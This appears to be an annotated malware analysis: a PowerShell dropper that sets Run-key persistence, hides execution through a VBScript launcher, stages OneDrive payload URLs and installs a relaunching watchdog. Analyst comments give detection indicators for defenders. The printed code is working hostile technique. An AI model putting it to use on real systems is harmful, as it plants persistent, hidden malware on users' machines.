

# Analyst note - persistence stage 1: builds a batch file whose two REG ADD
# lines create values named "1" and "2" under the current user's
# HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run key (entries in this key
# are launched at that user's logon).
#   value "1" -> C:\ProgramData\Twitter\log\Untitled.exe
#   value "2" -> a cmd.exe command line that starts powershell with
#                "-windo 1 -noexit -exec bypass -file ...\look.ps1"
# Detection: the PowerShell switches are abbreviated (-windo, -exec), so rules
# that match only the full -WindowStyle / -ExecutionPolicy spellings will not
# fire on this string. Match on Run-key writes that reference
# C:\ProgramData\Twitter\log\ instead.
$Content = @'
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\ProgramData\Twitter\log\Untitled.exe"
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2 /d "C:\Windows\System32\cmd.exe '/c  powershell -windo 1 -noexit -exec bypass -file C:\ProgramData\Twitter\log\look.ps1"
'@
# The batch file is dropped in the world-writable C:\Users\Public directory;
# a .bat created there by powershell.exe is a useful file-creation indicator.
Set-Content -Path C:\Users\Public\1.bat -Value $Content

# Analyst note - hidden launcher: the VBScript below creates a WScript.Shell
# object and runs C:\Users\Public\1.bat with window style 0 (hidden) and
# bWaitOnReturn = true, so no console window is shown while the batch file
# runs.
$Content = @'
set WshShell = wscript.createobject("WScript.shell")
WshShell.run """C:\Users\Public\1.bat"" ", 0, true
Set WshShell = Nothing
'@
Set-Content -Path C:\Users\Public\1.vbs -Value $Content
# Fixed 10-second delay before the launcher is started.
start-sleep 10
# "start" is the Start-Process alias; the .vbs is opened by whatever handler
# is registered for that extension (presumably wscript.exe - confirm on host).
# Expected process chain for detection: powershell.exe -> script host ->
# cmd.exe (1.bat) -> reg.exe, all referencing C:\Users\Public\.
# Note the Run-key values are registered at this point, before the script
# creates the C:\ProgramData\Twitter\log\ directory they point into.
start C:\Users\Public\1.vbs





# Analyst note - staging directory: creates C:\ProgramData\Twitter\log\ if it
# does not already exist. The vendor-looking folder name appears chosen to
# blend in with legitimate application data (inference; no such product is
# referenced elsewhere in this listing). Creation of this directory by
# powershell.exe is a host indicator.
$OutPath = "C:\ProgramData\Twitter\log\"
if (-not (Test-Path  $OutPath ))
        {
            # -Force makes New-Item succeed even if parent folders are missing.
            New-Item $OutPath -ItemType Directory -Force
        }

# Analyst note - payload retrieval setup: two OneDrive direct-download URLs
# (cid / resid / authkey query parameters) are paired with two target paths,
# Untitled.exe and Untitled.exe.manifest, in the staging directory.
# No method is ever called on $webclient in this listing, so as shown the
# URLs and targets are only assigned; the sample may be truncated or edited.
# Network indicator: powershell.exe requesting onedrive.live.com/Download
# with the cid value below.
start-sleep 5
# First URL / target pair (executable).
$cZZZcZxc = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21140&authkey=AD54_li6xAtRpc8"
$tofile = "C:\ProgramData\Twitter\log\Untitled.exe"
$webclient = New-Object System.Net.WebClient


# Second pair (manifest) reuses the same three variable names, overwriting
# the values assigned above.
$cZZZcZxc = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21139&authkey=AOITnE4lBM7QpdQ"
$tofile = "C:\ProgramData\Twitter\log\Untitled.exe.manifest"
$webclient = New-Object System.Net.WebClient
start-sleep 5
# Analyst note - watchdog script: the here-string below is an endless loop
# that checks once every 60 seconds for a process named "Untitled" and, when
# none is found, starts C:\ProgramData\Twitter\log\Untitled.exe again.
# Killing the payload process alone is therefore not sufficient during
# response; the powershell.exe instance running look.ps1 and the Run-key
# value that relaunches it must be removed as well.
# The inner "{ }" pair is an empty script block literal that is never invoked.
$Content = @'
while ($true){
if((get-process "Untitled" -ea SilentlyContinue) -eq $Null){
{
}
start C:\ProgramData\Twitter\log\Untitled.exe
}
start-sleep 60
}
'@
# Written next to the payload; look.ps1 in this directory is a file indicator.
Set-Content -Path C:\ProgramData\Twitter\log\look.ps1 -Value $Content

# Analyst note - watchdog launch: after a 5-second delay, a child
# powershell.exe is started with a hidden window, no profile, no logo and
# -ExecutionPolicy Unrestricted, with a script path as its positional
# argument.
start-sleep 5


# The path passed here is C:\log\ProgramData\Twitter\log\look.ps1, which is
# not the C:\ProgramData\Twitter\log\look.ps1 location this script writes
# the watchdog to. When hunting in command-line telemetry, search for both
# path strings.
powershell -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "C:\log\ProgramData\Twitter\log\look.ps1"


